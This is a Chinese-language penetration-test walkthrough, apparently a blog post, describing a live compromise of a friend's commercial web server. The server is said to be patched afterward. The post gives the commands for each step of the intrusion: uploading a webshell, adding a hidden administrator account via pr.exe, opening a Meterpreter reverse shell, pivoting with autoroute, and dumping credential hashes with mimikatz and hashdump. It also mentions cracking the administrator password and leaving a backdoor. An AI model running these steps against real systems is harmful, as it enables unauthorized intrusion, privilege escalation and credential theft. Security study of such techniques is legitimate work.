本次測試為實(shí)戰(zhàn)，測試環(huán)境為朋友的個人商業(yè)網(wǎng)站，服務(wù)器位于某數(shù)據(jù)中心，所提漏洞已通知并協(xié)助修復(fù)

首先借助該網(wǎng)站某處上傳漏洞，實(shí)現(xiàn)一句話木馬上傳，然后使用菜刀連接。

一句話

借助菜刀上傳asp大馬。

asp大馬

pr.exe "net user rabbit 123456 /add"
pr.exe "net localgroup administrators rabbit/add"

然后登錄嘗試發(fā)現(xiàn)目標(biāo)主機(jī)果然沒有使用默認(rèn)的3389端口。

pr.exe "tasklist /svc"
pr.exe "netstat -nao"

尋找termservice服務(wù)對應(yīng)的PID進(jìn)而尋找端口號，果然遠(yuǎn)程服務(wù)運(yùn)行在一個自定義端口。

這部分不再提供截圖，有疑問的可以參考之前發(fā)布過的一篇文章
http://www.itdecent.cn/p/0ad65b348e8a

嘗試使用asp木馬上傳metepreter木馬，發(fā)現(xiàn)莫名其妙失敗了，，，

metepreter

沒關(guān)系，我們已經(jīng)拿到了服務(wù)器，所以這里我們選擇遠(yuǎn)程桌面來上傳,記得勾上剪貼板。

遠(yuǎn)程桌面上傳

      mstsc /admin

msf木馬反向代理與frp的配置再此省略，大家可以自行參考之前的文章。
成功反彈木馬。

shell

關(guān)于這里有一個小技巧，如果我們是通過asp大馬來運(yùn)行的metepreter，我們的木馬提權(quán)可能會變得十分困難，然而我這里通過管理員用戶來登錄手動運(yùn)行，當(dāng)前權(quán)限即為我們創(chuàng)建的管理員用戶rabbit。

getsystem

#查看當(dāng)前網(wǎng)段
run get_local_subnets

網(wǎng)段查看

#添加路由
run autoroute -s 10.122.128.0/17

添加路由

#添加路由
run autoroute -p

路由查看

然后我們已經(jīng)將msf代入了當(dāng)前pc，使用background將metepreter置入后臺，我們就可以肆意的使用如永恒之藍(lán)等腳本對對方內(nèi)網(wǎng)展開屠殺了。。?？瓤龋欢疫@里的pc所處環(huán)境是一個數(shù)據(jù)中心，服務(wù)器之間內(nèi)網(wǎng)互相隔離，當(dāng)然這也是為了安全，關(guān)于這項技術(shù)，我們后期有機(jī)會會介紹下。
回到現(xiàn)實(shí)，既然我們不能對內(nèi)網(wǎng)進(jìn)行探測了，我們只能嘗試最大限度的擴(kuò)大我們的本機(jī)戰(zhàn)果。
還記得我們?nèi)腴T系列最后一節(jié)提到的load命令嗎，再次借機(jī)會展示一下：

mimikatz

mimikatz_command -f hash::lm
mimikatz_command -f hash::ntlm

借助mimikatz_command我們可以查看當(dāng)前用戶的hash密碼，支持lm/ntlm兩種加密方式。

mimikatz_command

當(dāng)然啦，我們已經(jīng)獲取到了系統(tǒng)system權(quán)限，我們可以借助metepreter自帶的命令直接獲取用戶hash。
如msv，獲取所有用戶詳情：

msv

hashdump

我們借助主流破解網(wǎng)站居然查到了一條，找小伙伴幫忙付費(fèi)解析了一下，成功拿到了administrator用戶的密碼。

cmd5

migrate

已有后門